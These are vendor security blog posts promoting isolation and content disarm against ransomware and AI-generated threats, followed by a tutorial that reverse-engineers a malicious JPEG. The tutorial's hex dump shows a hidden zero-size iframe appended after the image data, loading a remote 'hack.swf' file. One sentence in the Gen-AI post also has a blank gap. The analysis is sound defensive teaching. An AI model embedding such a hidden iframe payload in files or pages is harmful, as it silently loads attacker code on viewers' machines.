    Stop Negotiating with Ransomware and Start Isolating

    April 21, 2025

    Target: IT (Elementary)

    Tags: Threat Prevention, Isolation, Malware, Ransomware, Data at Rest, Content Disarm and Reconstruction


    For years, the cybersecurity community has struggled to combat the growing ransomware threat. The headlines are all too familiar — critical infrastructure crippled, hospitals
    brought to a standstill, and schools forced back to pen and paper, all while ransom demands flash across screens. As defenders, we have invested countless hours debating key
    questions: Should ransoms ever be paid? What are the ethical implications? What are the legal consequences?

    But we have been asking the wrong questions.

    Instead of debating whether to negotiate with cybercriminals [1], it is time to shift the conversation toward preventing attacks altogether. Rather than reacting after an attack occurs,
    organizations must adopt a proactive security strategy that stops ransomware before it can be executed.

    This is where endpoint application isolation, Content Disarm and Reconstruction (CDR), and data-at-rest security come into play. Together, these technologies establish a proactive,
    prevention-first security strategy that detects ransomware and neutralizes its attack vectors before any damage can occur.

    Prevention > Remediation

    The traditional cybersecurity approach emphasizes detection, alerting, and remediation. However, modern ransomware attacks are now faster, stealthier, and more evasive than ever.
    By the time an endpoint detection tool issues a warning, encryption may already be in progress—or even worse, the data may have been exfiltrated.

    Detection alone is insufficient.

    Prevention, through robust architectural controls, must be the primary line of defense.

    Application Isolation: Containing Threats Before They Spread

    Application isolation provides a secure environment for high-risk activities such as opening email attachments, handling downloaded files, and browsing the web. Inspired by air-gapped
    networks, where sensitive systems are physically separated from unsecured environments, this approach applies the same principle to modern endpoints by isolating risky operations
    from the core system.

    When deployed at the endpoint level, isolation ensures all high-risk actions occur within a protected container, separate from the host operating system. If a malicious file executes or a
    zero-day exploit attempts to launch ransomware from a phishing email, it remains trapped inside the container, never reaching the system.

    The result? No spread, no persistence, no lateral movement.

    And most importantly – no need for negotiation.

    CDR: Eliminating File-Based Threats at the Source

    Content Disarm and Reconstruction (CDR) takes a proactive approach to file security by treating every file as a potential threat, regardless of whether traditional security tools detect
    anything suspicious. Instead of relying on signature-based detection, CDR neutralizes risks at the source by stripping files of all active and potentially harmful elements, such as
    embedded macros, scripts, and hidden exploits, while preserving their usability. The result is a clean, threat-free version of the original file, seamlessly delivered to the end user.
    By breaking the attack chain at its earliest stage, CDR is particularly effective in stopping malware campaigns and ransomware infiltration before they can take hold.

    Data-at-Rest Security: Protecting What Matters Most

    Even if a threat actor breaches your defenses, their ultimate target is the data, whether to encrypt, steal, or leak it. This is where data-at-rest security plays a crucial role.

    By encrypting sensitive data and binding access to specific user identities or applications, organizations ensure that even if unauthorized users gain entry, the data remains inaccessible
    and unusable. When combined with zero-trust access policies, this approach fortifies security at its core, preventing data compromise even in the event of a breach.

    Shifting the Ransomware Defense Strategy: Prevention Over Negotiation

    The message is clear: stop negotiating with ransomware after an attack [1] – prevent it from ever taking hold. Instead of reacting to breaches, organizations must focus on isolating systems
    to block ransomware at its entry point.

    This is not just a tactical adjustment – it is a strategic evolution. Businesses must move beyond a reactive security model overwhelmed by constant alerts, security operations center (SOC)
    fatigue, and post-breach recovery. Instead, they need proactive technologies built on the assumption that attacks will happen – but designed to render those attacks irrelevant.

    How BUFFERZONE Helps You Isolate, Disarm, and Protect

    At BUFFERZONE®, we have spent years perfecting a prevention-based approach to endpoint protection.

    • Our endpoint application isolation creates secure containers for browsers, email clients, and downloaded content, ensuring that threats remain sealed off from the host.
    • Our advanced CDR engine sanitizes inbound files in real time, stripping out hidden threats before they reach users.
    • Our data protection controls extend to both cloud and on-prem environments, ensuring sensitive files remain encrypted, monitored, and policy-enforced—even if compromised.
    • Our NoCloud® AI technology runs advanced AI and Large Language Models (LLMs) directly on the endpoint—ensuring that sensitive data is analyzed securely, quickly, and
      privately. Unlike cloud-based solutions, NoCloud® never transmits your confidential information outside your device, delivering powerful intelligence without compromising data
      privacy.

    Unlike legacy detection focused solutions, BUFFERZONE® does not rely on signatures or threat intelligence. Our philosophy is simple: if it cannot reach you, it cannot hurt you.

    Final Thoughts

    Ransomware is not going away—it is evolving. But so should our response.

    Instead of planning for disaster recovery, we need to start planning for disaster prevention. With the right combination of isolation, file sanitization, and data security, we can eliminate
    the need to negotiate, remediate, or rebuild.

    Because the best way to deal with ransomware… is to never let it in.

    Do you want to learn how BUFFERZONE® can help your organization transition from relying solely on detection to preventing ransomware?

    Contact us to learn more.

    References

    [1] Doug Ennis, MSSP Alert, https://www.msspalert.com/perspective/we-dont-negotiate-with-terrorists-ransomware-strategy-in-modern-cybersecurity

    Zero-Trust Ransomware Protection

    April 3, 2025

    Target: IT (Elementary)

    Tags: Threat Prevention, Isolation, Malware, Ransomware

    Ransomware attacks have become a pervasive threat in the United States, affecting organizations across various sectors. In 2024, 59% of organizations experienced ransomware attacks,
    with the healthcare sector being the most impacted, accounting for 18.6% of annual attacks [1]. The average ransom payment in the U.S. during the third quarter of 2024 was approximately $479,237 [2].

    The financial implications of ransomware are staggering. In 2023, ransomware attackers extorted over $1 billion from victims, marking a record high [3]. Looking ahead, ransomware is projected to cost its victims around $265 billion annually by 2031, with a new attack occurring every two seconds [4].

    How Ransomware is Prevented Today

    Organizations use multiple security layers to prevent ransomware, including:

    • Endpoint Detection and Response (EDR): Monitors endpoints for suspicious activity and responds to threats.
    • Antivirus and Anti-Malware Solutions: Detect known ransomware signatures and block them.
    • Firewalls and Intrusion Detection Systems (IDS): Protect networks by filtering malicious traffic.
    • Email Security Solutions: Identify phishing emails and block malicious attachments.
    • Backup and Disaster Recovery: Ensures that organizations can recover data without paying ransom.
    • Security Awareness Training: Educates employees on identifying phishing attempts and social engineering tactics.

    Limitations of Traditional Security Approaches

    While these methods provide some protection, they have critical weaknesses:

    • Signature-Based Detection is Insufficient: Many ransomware variants are polymorphic, evading traditional antivirus solutions.
    • EDR Requires Post-Infection Response: It detects and mitigates threats after an attack has already begun.
    • Human Error is Inevitable: Despite training, employees may still fall victim to phishing attacks [5].
    • Backup Strategies Are Vulnerable: Modern ransomware targets backup files, encrypting them before they can be restored.

    The Zero-Trust Approach to Ransomware Prevention

    To combat these challenges, many organizations are adopting zero-trust security models. Unlike traditional security frameworks that assume entities within the network are
    trustworthy, zero-trust operates on the principle of “never trust, always verify.” Every access request is authenticated, authorized, and continuously validated, regardless of its origin.
    Extending this concept, applications, processes, and network communications can be isolated. Files are not merely scanned for threats, since detection implicitly trusts whatever the
    scanner clears; instead, they are disarmed using Content Disarm and Reconstruction (CDR). This model prevents ransomware from establishing a foothold in the system.

    How Zero-Trust Solutions Stop Ransomware

    • Micro-Segmentation: Limits lateral movement by isolating devices, applications, and workloads.
    • Least Privilege Access: Ensures that users and applications only have access to what is strictly necessary.
    • Multi-Factor Authentication (MFA): Reduces the risk of credential theft by requiring multiple forms of verification.
    • Continuous Monitoring: Uses AI and behavioral analysis to detect anomalies in real time.
    • Isolation Technology: Runs untrusted content in a secure environment to prevent execution of ransomware.

    BUFFERZONE Protection By Containment™

    BUFFERZONE® takes zero-trust security further by employing Protection By Containment™, which isolates external threats directly on the endpoint. This method ensures users can
    interact with potentially risky content without exposing their system to ransomware.

    Key Components:

    • Safe Browser: Runs untrusted web sessions in an isolated container, preventing drive-by downloads and browser exploits. By using Browser Isolation, we significantly reduce
      the external attack vectors.
    • Safe Mail: Opens email attachments and links in a virtualized environment, blocking malware execution.
    • Safe Externals: Secures external storage devices like USBs, ensuring that infected files do not spread ransomware.
    • SafeBridge® AI: Zero-Trust File Security ensures secure transfer of files from an isolated environment to a trusted network. BUFFERZONE utilizes SafeBridge®, a zero-trust
      file-handling solution that incorporates on-host Content Disarm and Reconstruction (CDR) technology. This technology sanitizes any active or suspicious content within files,
      delivering a reconstructed and secure version to prevent the spread of ransomware during file transfers. Powered by NoCloud® AI technology, we can identify and explain the
      evasive attack vectors hidden within the files.
    • Safe Data: AI-powered Vault that protects data-at-rest from ransomware and other data-stealing threats. It actively scans files for business and legal confidential information
      and secures them in a virtual vault, ensuring that sensitive data remains protected from potential ransomware attacks. The BUFFERZONE® data classification engine scans for
      confidential business data, medical information, and internal records, suggesting that sensitive information be stored in the vault.

    Conclusion

    The rising threat of ransomware necessitates a proactive and comprehensive security strategy. Traditional prevention methods provide some protection but are not foolproof.
    The zero-trust model strengthens security by continuously verifying trust, limiting access, and isolating threats. BUFFERZONE® Protection By Containment™ technology, combined
    with NoCloud® technology and solutions such as SafeBridge® AI and Safe Data, significantly enhances ransomware defenses by securing web browsing, email attachments, removable
    media, file transfers, and sensitive data.

    By integrating zero-trust principles with advanced isolation and AI-powered data protection, organizations can drastically reduce ransomware risks and protect their critical assets.


    Contact us to learn more.

    References

    [1] Steve Alder, The HIPAA Journal, Healthcare Ransomware Attacks Continue to Increase in Number and Severity, 2024

    [2] Statista, Average amount of cyber ransom payments at organizations in the United States from 1st quarter 2022 to 3rd quarter 2024, https://www.statista.com/statistics/1409510/ransom-payment-us-quarterly-amount/, 2024

    [3] Chainalysis, 2024 Crypto Crime Trends: Illicit Activity Down as Scamming and Stolen Funds Fall, But Ransomware and Darknet Markets See Growth, https://www.chainalysis.com/blog/2024-crypto-crime-report-introduction/

    [4] David Braue, Cybercrime Magazine, Global Ransomware Damage Costs Predicted to Exceed $265 Billion By 2031, https://cybersecurityventures.com/ransomware-report-2021/

    [5] Verizon, 2024 Data Breach Investigations Report, 2024


    Gen AI Bypasses Detection! It Is Time for AI-Powered Prevention

    February 3, 2025

    Target: IT (Elementary)

    Tags: Anti-Phishing, Gen-AI, Threat Prevention, Isolation, Malware, NoCloud®

    Artificial Intelligence (AI) has rapidly transformed the cybersecurity landscape, serving as both a defensive tool and a weapon for attackers.
    A recent article from The Hacker News highlights a major shift in cyber threats:   , overwhelming traditional detection methods that rely on behavioral and
    other pattern recognition, known threat signatures, and AI-based detection systems. Research from the Financial Times reveals that cybercriminals are also
    leveraging AI to craft highly convincing phishing emails aimed at corporate executives, blurring the line between legitimate communication and fraud.
    These attacks often seek to steal sensitive information, compromise financial systems, or disrupt operations.

    Gen-AI cyberattacks represent an escalating threat due to their sophistication. AI tools can generate hyper-realistic phishing emails that mimic individual or
    organizational writing styles, making detection increasingly difficult. Additionally, Gen-AI powers personalized social engineering attacks by analyzing vast
    amounts of data about individuals to craft highly targeted and persuasive messages. Its ability to create novel malware that evades traditional defenses, while
    automating various aspects of attacks, enhances both the speed and effectiveness of cybercrimes.

    The accessibility of Gen-AI tools has lowered the barrier to entry for cybercriminals, allowing even those with minimal technical expertise and financial resources
    to execute advanced attacks. Moreover, the rapid evolution of Gen-AI models poses ongoing challenges for security teams trying to keep up with emerging threats, including
    deepfake attacks that manipulate audio recordings and conversations to deceive targets. Just recently, BleepingComputer reported that LastPass revealed a failed phishing
    attempt in which hackers used deepfake audio of the company's CEO to try to deceive employees. The attack was conducted over WhatsApp, a communication channel the CEO does
    not use for business purposes. Recognizing the unusual choice of platform, the employee identified the irregularity and avoided falling victim to the scam.
    This convergence of AI-driven cyber capabilities underscores the urgent need for innovative and adaptive cybersecurity measures.

    The Challenges of Gen-AI Detection

    Detection-based security solutions, such as antivirus software, Endpoint Detection and Response (EDR) systems, and Intrusion Detection Systems (IDS), rely on identifying
    known malicious patterns or behaviors. However, generative AI poses a significant challenge to these systems by crafting malware designed to evade detection.
    Techniques like obfuscation and polymorphism enable AI-generated threats to continuously adapt, rendering traditional detection methods increasingly ineffective.
    For example, by leveraging machine learning, attackers can:

    • Evade Static Analysis: Generate malware variants with unique signatures, making them unrecognizable to traditional static analysis tools.
    • Confuse Behavioral Analysis: Create malicious code with dynamic behaviors that appear benign during observation.
    • Scale Attacks: Automate malware creation to overwhelm detection systems with thousands of new strains daily.

    Advancements in Gen AI highlight the shortcomings of detection-based security. While detection remains an essential element of a multi-layered defense strategy, it struggles
    to keep pace with the evolving and adaptive nature of Gen AI-driven threats.

    Shifting the Paradigm to Prevention Powered by AI

    Organizations encounter a range of security challenges and should prioritize prevention-focused solutions to strengthen their security posture. Prevention strategies take a
    proactive approach, aiming to block threats before they can cause harm. Two highly effective technologies in this domain are application isolation and advanced AI phishing
    detection.
    The Hacker News presented two use cases, the first based on malware generation and the other based on JavaScript phishing attack generation.

    BUFFERZONE® offers a new perspective on solving security challenges through two innovative technologies: Protection By Containment™ and NoCloud® AI.
    The first technology isolates external threats that may arise from web browsing, file downloads, and email links or attachments. The second technology prevents attacks
    beyond isolation using advanced AI.

    • Protection by Isolation Technology: creates a virtual container for running applications and opening files, ensuring that any malicious activity is confined to a secure
      environment.
      The solution includes:

      • Safe Browser: Chrome, Edge, and Firefox browser isolation within the containment. File downloads are secured inside the isolation. SafeBridge® employs a zero-trust
        Content Disarm and Reconstruction (CDR) process to transfer them, which can be handled automatically or manually.
      • Safe Mail: emails automatically undergo CDR, and email attachments/links can be opened in a virtual isolated environment, preventing the malware from accessing the host
        system.
      • Safe Externals: isolation of USB, CD, and DVD while enabling the ability to open and edit images, videos, and documents securely.

    Isolation ensures that even if malware bypasses detection, its impact is nullified, protecting the endpoint and the internal networks.

    • NoCloud® Advanced Phishing Detection: While Protection By Containment™ isolates external threats, some attacks happen beyond isolation, and phishing attacks are
      one example. Phishing continues to be a primary attack vector, with Gen AI amplifying the issue by creating highly convincing phishing content. Advanced phishing detection
      tools use AI to analyze URLs, page content, and brand impersonation in real time, preventing users from interacting with malicious sites. Endpoint-based phishing detection is
      particularly crucial because it operates independently of reputation databases, which can lag in identifying emerging threats. While most phishing solutions today rely on
      reputation, this approach is limited by Gen AI’s rapid ability to create new permutations. Therefore, a secure, real-time alternative like NoCloud®, which avoids uploading
      sensitive data, is essential.

    The Case for Endpoint-Centric Security

    Gen AI’s ability to generate malware and phishing campaigns underscores the importance of endpoint-centric security. By deploying isolation and advanced phishing detection
    directly on endpoints, organizations can:

    • Minimize the attack surface by preventing threats at the point of entry.
    • Reduce reliance on network-based solutions, which may not catch threats targeting remote or distributed endpoints.
    • Ensure real-time protection, even against zero-day threats or novel attack techniques.

    Preparing for the Future

    The rise of Gen AI-driven threats marks a turning point in cybersecurity. To stay ahead, organizations must:

    • Invest in innovative prevention technologies that integrate isolation and AI-driven detection.
    • Educate users about the risks of phishing and other social engineering attacks.
    • Continuously evaluate and update their security posture to address evolving threats.

    As attackers leverage AI to bypass detection, the security industry must innovate to outsmart them. Prevention, powered by isolation and advanced endpoint AI technologies,
    is no longer optional but essential. By adopting these strategies, organizations can safeguard their systems and data against the next wave of AI-driven cyber threats.

    Contact us to learn more.


    The Beginner's Guide – Reversing and Preventing the Invisible Malware and How CDR Can Improve Our Security (Part 3)

    January 25, 2024

    Target: Cybersecurity specialist

    Tags: JPEG, Image, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Protection by containment™

    In this article, we venture into the intricacies of malware attacks deployed via Joint Photographic Experts Group (JPEG) images, demystifying the techniques for
    reverse-engineering these files. We will scrutinize the application of Content Disarm and Reconstruction (CDR) technology in neutralizing such threats, thereby safeguarding
    images from covert malware implantation. The preceding blogs in this series provided insights into the arena of steganography detection, termed steganalysis, in part 1, and the
    pivotal role of CDR in precluding steganographic malware onslaughts in part 2.

    As highlighted in the earlier blogs, we are witnessing a surge in image-based cyberattacks. For instance, images from the James Webb Space Telescope [1] were manipulated as
    part of a malware stratagem. These compromised visuals were disseminated through websites or embedded within documents. The specifics of these threats fluctuate across
    different attacks. In certain scenarios, malicious code can be appended to the end of a file, minor adjustments can be made to individual bits of the code, or alterations can be
    introduced in the metadata linked with a file. In other instances, innocuous Windows logos were exploited through a steganography attack to hide malicious backdoors [2].

    JPEG Compression

    JPEG is a widely used method of lossy compression for digital images, particularly for those images produced by digital photography. The degree of compression can be adjusted,
    allowing a selectable tradeoff between storage size and image quality. JPEG typically achieves 10:1 compression with little perceptible loss in image quality.
    The file name usually ends with the .jpg or .jpeg extension, and the format is widely accepted and used in digital photography, web graphics, and image archiving.

    The JPEG compression algorithm works primarily in the following stages:

    • Color Space Conversion: The image data is converted from RGB color space to YCbCr. The Y component represents luminance (brightness), while the Cb and Cr
      components represent chrominance (color). This allows the algorithm to take advantage of the human eye’s higher sensitivity to changes in brightness than to changes in color.
    • Subsampling: The chrominance components are typically subsampled to further reduce the amount of data. This is based on the fact that human eyes are less sensitive to
      changes in color information than brightness.
    • Block Splitting: The image is divided into blocks of 8×8 pixels.
    • Discrete Cosine Transform (DCT): Each block is then transformed from spatial domain to frequency domain using DCT. The DCT expresses a finite sequence of data
      points in terms of a sum of cosine functions oscillating at different frequencies.
    • Quantization: The DCT coefficients are then quantized. This is the lossy part of the JPEG compression. Higher frequency components (which correspond to fine detail
      and texture in the image) are usually quantized more heavily than lower frequency components.
    • Entropy Coding: Lastly, lossless entropy coding (a form of Huffman coding or arithmetic coding) is applied to compress the quantized values further.
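    To make the block, DCT and quantization stages concrete, the following is a worked example added for this article (it is not code from the original post or from any JPEG library): a pure-Python forward and inverse DCT on one 8×8 block, quantized with the standard luminance table from ITU T.81 Annex K. The two sample blocks (a flat block and a horizontal ramp) are constructed inline. It shows why quantization is the lossy step: a flat block collapses to a single DC coefficient, and the ramp comes back with small per-pixel errors once its high-frequency coefficients are rounded away.

```python
# Added example: the DCT + quantization stages of JPEG on one 8x8 block.
# Not code from the article or from libjpeg; pure Python, standard library only.
import math

# Standard JPEG luminance quantization table (ITU T.81, Annex K, Table K.1).
LUMA_QT = [
    [16, 11, 10, 16, 24, 40, 51, 61],
    [12, 12, 14, 19, 26, 58, 60, 55],
    [14, 13, 16, 24, 40, 57, 69, 56],
    [14, 17, 22, 29, 51, 87, 80, 62],
    [18, 22, 37, 56, 68, 109, 103, 77],
    [24, 35, 55, 64, 81, 104, 113, 92],
    [49, 64, 78, 87, 103, 121, 120, 101],
    [72, 92, 95, 98, 112, 100, 103, 99],
]


def _c(u):
    # Normalization factor of the DCT basis: 1/sqrt(2) for the DC term, 1 otherwise.
    return 1 / math.sqrt(2) if u == 0 else 1.0


def dct2(block):
    """Forward 2-D DCT (type II) of an 8x8 block of level-shifted samples."""
    out = [[0.0] * 8 for _ in range(8)]
    for u in range(8):
        for v in range(8):
            s = 0.0
            for x in range(8):
                for y in range(8):
                    s += (block[x][y]
                          * math.cos((2 * x + 1) * u * math.pi / 16)
                          * math.cos((2 * y + 1) * v * math.pi / 16))
            out[u][v] = 0.25 * _c(u) * _c(v) * s
    return out


def idct2(coefs):
    """Inverse 2-D DCT: frequency coefficients back to spatial samples."""
    out = [[0.0] * 8 for _ in range(8)]
    for x in range(8):
        for y in range(8):
            s = 0.0
            for u in range(8):
                for v in range(8):
                    s += (_c(u) * _c(v) * coefs[u][v]
                          * math.cos((2 * x + 1) * u * math.pi / 16)
                          * math.cos((2 * y + 1) * v * math.pi / 16))
            out[x][y] = 0.25 * s
    return out


def quantize(coefs, qt=LUMA_QT):
    # The lossy step: divide each coefficient by its table entry and round.
    return [[int(round(coefs[u][v] / qt[u][v])) for v in range(8)] for u in range(8)]


def dequantize(q, qt=LUMA_QT):
    return [[q[u][v] * qt[u][v] for v in range(8)] for u in range(8)]


def encode_block(pixels):
    """Level shift (-128), DCT, quantize: what an encoder keeps for one block."""
    shifted = [[p - 128 for p in row] for row in pixels]
    return quantize(dct2(shifted))


def decode_block(q):
    """Dequantize, inverse DCT, undo the level shift and clamp to 0..255."""
    rec = idct2(dequantize(q))
    return [[max(0, min(255, int(round(v + 128)))) for v in row] for row in rec]


def nonzero_count(q):
    # Coefficients that survive quantization; fewer means better entropy coding.
    return sum(1 for row in q for v in row if v != 0)


def max_abs_error(a, b):
    return max(abs(a[i][j] - b[i][j]) for i in range(8) for j in range(8))


# Constructed sample blocks (not taken from any real image).
FLAT_BLOCK = [[178] * 8 for _ in range(8)]            # uniform grey
RAMP_BLOCK = [[100 + 10 * y for y in range(8)] for _ in range(8)]  # horizontal ramp

if __name__ == "__main__":
    for name, block in (("flat", FLAT_BLOCK), ("ramp", RAMP_BLOCK)):
        q = encode_block(block)
        back = decode_block(q)
        print(f"{name}: DC={q[0][0]} nonzero={nonzero_count(q)} "
              f"max pixel error={max_abs_error(block, back)}")
```

    The flat block keeps exactly one coefficient (DC = 400 / 16 = 25) and reconstructs without error; the ramp keeps only a handful of first-row coefficients and reconstructs with an error of a few grey levels. That rounding is also why re-encoding an image through a different quantizer disturbs data hidden in the DCT coefficients, a point that matters later when CDR reconstruction is discussed.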

    JPEG File Structure

    A JPEG file is composed of several segments or sections, each with a specific function:

    • Start of Image (SOI): This marker denotes the beginning of the image data. It consists of two bytes: 0xFF and 0xD8.
    • Application-Specific Markers (APP0 to APP15): These are optional markers and are used for different purposes, such as storing metadata.
      APP0 and APP1 are the most used, with APP0 often used for JFIF (JPEG File Interchange Format) data, and APP1 commonly used for EXIF data.
    • Quantization Table (DQT): This segment contains one or more quantization tables. These tables are used during the quantization phase of compression, where the
      DCT coefficients are divided by the quantization coefficients.
    • Huffman Table (DHT): This segment contains one or more Huffman tables, used for entropy coding. They define the Huffman code words for different values that are
      encoded and decoded.
    • Start of Frame (SOF): This marker indicates the beginning of the frame data. There are several types of SOF markers depending on the type of compression used.
      It contains information about the image dimensions and the number of color components in the image.
    • Start of Scan (SOS): This marker indicates the start of a new scan. A scan can be thought of as a layer of the image, and multiple scans can be used for progressive JPEGs.
      It is followed by the actual image data.
    • End of Image (EOI): This marker indicates the end of the image data. Like the SOI, it consists of two bytes: 0xFF and 0xD9.

    It is also worth noting that many JPEG files contain metadata in the form of EXIF (Exchangeable Image File Format) data. This can include information such as camera settings,
    timestamps, geolocation, and copyright information. The EXIF data is usually stored in an APP1 marker segment.

    In addition to these, there are several other markers used for things like defining restart intervals (DRI), comments (COM), and more.

    Image Investigation Tools

    In this blog, we will use the well-known ExifTool and JPEGDump. ExifTool is a software program that allows users to read, write, and edit metadata in a wide variety of files.
    Created by Phil Harvey, it is a versatile tool that is especially valuable for handling image, audio, and video metadata. By viewing the file metadata, we can spot malicious code
    hidden inside it.

    JPEGDump was created by Didier Stevens. It allows users to analyze the structure and contents of JPEG files, which is particularly useful in cases where these files may have been
    used to hide or transport malicious data. The JPEGDump tool parses a JPEG file and breaks down the different sections, or markers, providing insight into the file’s structure.
    This includes, but is not limited to, markers for the Start of Image (SOI), application markers like Exif or JFIF, Start of Scan (SOS), Define Huffman Table (DHT), and End of Image (EOI).
    By using JPEGDump, an analyst can get a more detailed understanding of what is in a JPEG file beyond just the visible image.
    This is particularly useful when looking for signs of steganography (the practice of concealing data within other data) or other forms of data hiding, for example data hidden
    between sections or at the end of the file.

    Reverse Engineering a JPEG Image

    We will analyze the file with SHA-256 hash 1bd88ba79ff1c3fd163a510c6b0dab61a645735de5def59a2b675d5f2faacfd7.

    We will start with ExifTool since it provides a straightforward way to view the file metadata and properties.

    exiftool <path>

    In this case, the partial output shows no suspicious content. In other cases, you may see it in the image description, copyright, or other metadata sections.

    Now we turn to JPEGDump. We first run it as follows: python jpegdump.py <file>

    File: 1bd88ba79ff1c3fd163a510c6b0dab61a645735de5def59a2b675d5f2faacfd7
    1 p=0x00000000    : m=ffd8 SOI
    2 p=0x00000002 d=0: m=ffe0 APP0  l=   16 e=2.549523 a=28.615385
    3 p=0x00000014 d=0: m=ffe1 APP1  l=45914 e=4.200871 a=33.829670
    4 p=0x0000b370 d=0: m=ffed APP13 l= 2630 e=6.982704 a=60.845070
    5 p=0x0000bdb8 d=0: m=ffee APP14 l=   14 e=2.751629 a=33.090909
    6 p=0x0000bdc8 d=0: m=ffdb DQT   l=  132 e=2.809793 a=1.069767 remark: 130/65 = 2.000000
    7 p=0x0000be4e d=0: m=ffc0 SOF0  l=   17 e=2.739572 a=24.500000 remark: p=8 h=800 w=347 c=3
    8 p=0x0000be61 d=0: m=ffdd DRI   l=    4 e=1.000000 a=44.000000
    9 p=0x0000be67 d=0: m=ffc4 DHT   l=  418 e=7.034882 a=37.513253
    10 p=0x0000c00b d=0: m=ffda SOS   l=   12 e=2.446439 a=21.222222 remark: c=3
    p=0x0000c15d    : m=ffd0 RST0
    p=0x0000c2a0    : m=ffd1 RST1
    p=0x0000c3f8    : m=ffd2 RST2
    p=0x0000c52e    : m=ffd3 RST3
    p=0x0000c6e2    : m=ffd4 RST4
    p=0x0000c90e    : m=ffd5 RST5
    p=0x0000cb91    : m=ffd6 RST6
    p=0x0000ce31    : m=ffd7 RST7
    p=0x0000d15d    : m=ffd0 RST0
    p=0x0000d497    : m=ffd1 RST1
    p=0x0000d737    : m=ffd2 RST2
    p=0x0000d956    : m=ffd3 RST3
    p=0x0000da9e    : m=ffd4 RST4
    p=0x0000dc29    : m=ffd5 RST5
    p=0x0000ddee    : m=ffd6 RST6
    p=0x0000e047    : m=ffd7 RST7
    p=0x0000e2b4    : m=ffd0 RST0
    p=0x0000e50d    : m=ffd1 RST1
    p=0x0000e76a    : m=ffd2 RST2
    p=0x0000ea53    : m=ffd3 RST3
    p=0x0000ec9b    : m=ffd4 RST4
    p=0x0000ef13    : m=ffd5 RST5
    p=0x0000f194    : m=ffd6 RST6
    p=0x0000f377    : m=ffd7 RST7
    p=0x0000f4b6    : m=ffd0 RST0
    p=0x0000f636    : m=ffd1 RST1
    p=0x0000f80d    : m=ffd2 RST2
    p=0x0000fa80    : m=ffd3 RST3
    p=0x0000fd4f    : m=ffd4 RST4
    p=0x00010040    : m=ffd5 RST5
    p=0x0001030c    : m=ffd6 RST6
    p=0x000105ae    : m=ffd7 RST7
    p=0x000107fd    : m=ffd0 RST0
    p=0x00010a31    : m=ffd1 RST1
    p=0x00010c00    : m=ffd2 RST2
    p=0x00010de0    : m=ffd3 RST3
    p=0x00010fa8    : m=ffd4 RST4
    p=0x00011167    : m=ffd5 RST5
    p=0x0001138c    : m=ffd6 RST6
    p=0x000115d9    : m=ffd7 RST7
    p=0x000118a7    : m=ffd0 RST0
    p=0x00011b94    : m=ffd1 RST1
    p=0x00011ea1    : m=ffd2 RST2
    p=0x000121b0    : m=ffd3 RST3
    p=0x000124e2    : m=ffd4 RST4
    p=0x0001273a    : m=ffd5 RST5
    p=0x00012960    : m=ffd6 RST6
    p=0x00012b42    : m=ffd7 RST7
    p=0x00012cc3    : m=ffd0 RST0
    p=0x00012e6b    : m=ffd1 RST1
    p=0x000130a7    : m=ffd2 RST2
    p=0x00013371    : m=ffd3 RST3
    p=0x000135f8    : m=ffd4 RST4
    p=0x00013890    : m=ffd5 RST5
    p=0x00013b58    : m=ffd6 RST6
    p=0x00013dfa    : m=ffd7 RST7
    p=0x000140f8    : m=ffd0 RST0
    p=0x000143c0    : m=ffd1 RST1
    p=0x000145e7    : m=ffd2 RST2
    p=0x00014801    : m=ffd3 RST3
    p=0x00014989    : m=ffd4 RST4
    p=0x00014af5    : m=ffd5 RST5
    p=0x00014caa    : m=ffd6 RST6
    p=0x00014e8d    : m=ffd7 RST7
    p=0x000150d0    : m=ffd0 RST0
    p=0x0001536c    : m=ffd1 RST1
    p=0x0001561f    : m=ffd2 RST2
    p=0x000158c0    : m=ffd3 RST3
    p=0x00015b8d    : m=ffd4 RST4
    p=0x00015df7    : m=ffd5 RST5
    p=0x00015f9d    : m=ffd6 RST6
    p=0x00016123    : m=ffd7 RST7
    p=0x000162ad    : m=ffd0 RST0
    p=0x00016463    : m=ffd1 RST1
    p=0x000166d6    : m=ffd2 RST2
    p=0x000169f0    : m=ffd3 RST3
    p=0x00016c7f    : m=ffd4 RST4
    p=0x00016f25    : m=ffd5 RST5
    p=0x0001722e    : m=ffd6 RST6
    p=0x000174af    : m=ffd7 RST7
    p=0x000176a9    : m=ffd0 RST0
    p=0x00017894    : m=ffd1 RST1
    p=0x00017a55    : m=ffd2 RST2
    p=0x00017bf2    : m=ffd3 RST3
    p=0x00017dac    : m=ffd4 RST4
    p=0x00017fad    : m=ffd5 RST5
    p=0x000181c9    : m=ffd6 RST6
    p=0x00018410    : m=ffd7 RST7
    p=0x000186c8    : m=ffd0 RST0
    p=0x00018993    : m=ffd1 RST1
    p=0x00018c07    : m=ffd2 RST2
    p=0x00018ee5    : m=ffd3 RST3
    p=0x000191d7    : m=ffd4 RST4
    p=0x00019455    : m=ffd5 RST5
    p=0x000195ec    : m=ffd6 RST6
    p=0x0001977e    : m=ffd7 RST7
    p=0x00019908    : m=ffd0 RST0
    p=0x00019ab0    : m=ffd1 RST1
    p=0x00019c5e    : m=ffd2 RST2
    entropy-coded data: l=56814 e=7.968988 a=84.686040 #ff00=171
    11 p=0x00019e07 d=0: m=ffd9 EOI
    12 p=0x00019e09    : *trailing*  l=   79 e=4.714881

    We can observe that the file starts with SOI and ends with EOI. In this file, marker 12 (highlighted in red) is trailing data: 79 bytes that sit after the EOI marker and are not part of the image structure.

    To view that data, we can use: python jpegdump -s 12 <file>

    The output is as follows:

    00019E09: 3C 69 66 72 61 6D 65 20  73 72 63 3D 68 74 74 70  <iframe src=http
    00019E19: 3A 2F 2F 69 64 63 2E 39  65 33 2E 63 6F 6D 2F 77  ://idc.9e3.com/w
    00019E29: 65 62 2F 68 61 6F 31 32  33 2F 68 61 63 6B 2E 73  eb/hao123/hack.s
    00019E39: 77 66 20 77 69 64 74 68  3D 30 20 68 65 69 67 68  wf width=0 heigh
    00019E49: 74 3D 30 3E 3C 2F 69 66  72 61 6D 65 3E 0D 0A     t=0></iframe>..

    The trailing bytes contain an iframe whose source URL points to a static Adobe SWF (Shockwave Flash) resource. At the time of writing, the link is no longer active.

    On VirusTotal, 22 engines detect the file as malicious; however, the URL reputation is currently clean and the resource is no longer available
    (the sample was last analyzed 12 hours before writing, but it originally dates from 2014).


    Detection Is Not Enough

    In this example from 2014, which is straightforward to examine, the detection rate was 22 out of 59. With more convoluted attacks, the detection rate tends to be
    significantly lower. Content Disarm and Reconstruction (CDR) is a zero-trust file prevention strategy that does not hinge on detection: CDR sanitizes files, removes metadata,
    and purges hidden data, regardless of whether that data is malicious or merely suspicious. This guarantees the safety of the delivered content (for more details, please refer to Part 2 of this series).

